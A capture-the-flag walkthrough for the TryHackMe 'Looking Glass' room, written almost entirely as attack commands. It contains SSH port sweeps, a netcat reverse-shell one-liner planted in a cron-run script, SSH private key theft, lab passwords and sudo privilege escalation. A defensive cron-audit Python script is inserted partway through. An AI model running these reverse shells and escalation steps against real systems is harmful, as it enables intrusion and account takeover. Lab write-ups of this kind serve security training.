Looking Glass
Room Link: https://tryhackme.com/room/lookingglass
Initial Scan
Kali
nmap -A $VICTIM

Scan all ports
Same result as the first scan: a lot of SSH ports are open.
Kali
nmap -sV -sT -O -p 1-65535 $VICTIM
TCP/22 - SSH
Kali
nmap -A $VICTIM -oN results.txt
grep -oE '^[0-9]+/' results.txt > num.txt
cat num.txt

Kali
cat num.txt | tr -d '\n' | sed 's/\//,/g' | tr -d ' '

Kali
for port in 9000 9001 9002 9003 9009 9010 9011 9040 9050 9071 9080 9081 9090 9091 9099 9100 9101 9102 9103 9110 9111 9200 9207 9220 9290 9415 9418 9485 9500 9502 9503 9535 9575 9593 9594 9595 9618 9666 9876 9877 9878 9898 9900 9917 9929 9943 9944 9968 9998 9999 10000 10001 10002 10003 10004 10009 10010 10012 10024 10025 10082 10180 10215 10243 10566 10616 10617 10621 10626 10628 10629 10778 11110 11111 11967 12000 12174 12265 12345 13456 13722 13782 13783; do
echo "connecting to port $port"; ssh -o 'LogLevel=ERROR' -o 'StrictHostKeyChecking=no' -p $port test@$VICTIM;done

Kali
for i in $(seq 12345 13465); do echo "connecting to port $i"; ssh -o 'LogLevel=ERROR' -o 'StrictHostKeyChecking=no' -p $i $VICTIM;done | grep -vE 'Lower|Higher'

Key: thealphabetcipher


Kali
ssh $VICTIM -p 12350
Password: bewareTheJabberwock

Initial Access
Kali
ssh jabberwock@$VICTIM
Password: PlaceThanksSelfishGrinned
Victim
sudo -l

Victim
cat /etc/crontab

Victim
cd /home/jabberwock
vi twasBrillig.sh
twasBrillig.sh
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f | /bin/sh -i 2>&1 | nc $KALI 1337 >/tmp/f

Kali
nc -lvnp 1337
Victim
sudo /sbin/reboot
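
A defender-side check for the pattern this step relies on: a system cron job that runs, as one user, a script that a different user owns. This is an added example, not part of the original walkthrough; the crontab sample is constructed (the page does not show the file's contents), and `stat_owner`, `parse_jobs` and `audit` are hypothetical names.

```python
import os
import pwd
import shlex

# Constructed sample in /etc/crontab format (assumption: the page does not
# show the real file). The @reboot line models the job this step relies on.
SAMPLE_CRONTAB = """\
SHELL=/bin/sh
17 * * * * root cd / && run-parts --report /etc/cron.hourly
@reboot tweedledee bash /home/jabberwock/twasBrillig.sh
"""

def stat_owner(path):
    """Return the user name owning path, or None if it cannot be resolved."""
    try:
        return pwd.getpwuid(os.stat(path).st_uid).pw_name
    except (OSError, KeyError):
        return None

def parse_jobs(text):
    """Yield (run_as_user, command) for each job line of a system crontab."""
    for line in text.splitlines():
        fields = line.split()
        if not fields or fields[0].startswith("#") or "=" in fields[0]:
            continue  # blank line, comment, or environment assignment
        # "@reboot"-style lines have one schedule field, classic lines five.
        skip = 1 if fields[0].startswith("@") else 5
        if len(fields) > skip + 1:
            yield fields[skip], " ".join(fields[skip + 1:])

def audit(text, owner_of=stat_owner):
    """Flag jobs that run a file owned by neither root nor the run-as user."""
    findings = []
    for user, command in parse_jobs(text):
        try:
            tokens = shlex.split(command)
        except ValueError:  # unbalanced quotes: fall back to whitespace split
            tokens = command.split()
        for token in tokens:
            owner = owner_of(token) if token.startswith("/") else None
            if owner not in (None, "root", user):
                findings.append((user, token, owner))
    return findings

if __name__ == "__main__":
    for user, path, owner in audit(open("/etc/crontab").read()):
        print(f"job runs as {user} but {path} is owned by {owner}")
```

On a live host, call `audit()` without `owner_of` so ownership comes from `os.stat`; the check covers file ownership only, not write permissions on the parent directory.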

Get autocomplete
python3 -c 'import pty; pty.spawn("/bin/bash")'
ctrl + Z
stty raw -echo;fg
Victim(tweedledee)
cd /home/tweedledee
cat humptydumpty.txt


Victim(tweedledee)
sudo -l
sudo -u tweedledum /bin/bash

Victim(tweedledum)
cd /home/tweedledum/
cat humptydumpty.txt


Victim(tweedledum)
su humptydumpty
Password: zyxwvutsrqponmlk
I can get into alice's folder, but I can't actually ls and see files. I tried looking at files that are usually there and found her id_rsa key.
Victim(humptydumpty)
cd /home/alice
cat .ssh/id_rsa

Copy key to Kali
Kali
chmod 600 id_rsa
ssh alice@$VICTIM -i id_rsa

Privilege Escalation
LinPeas
Kali
wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh
python2 -m SimpleHTTPServer 81
Victim(alice)
cd /tmp/
wget http://$KALI:81/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh

Victim(alice)
cat /etc/sudoers.d/alice
sudo -h ssalg-gnikool -l
sudo -h ssalg-gnikool /bin/bash
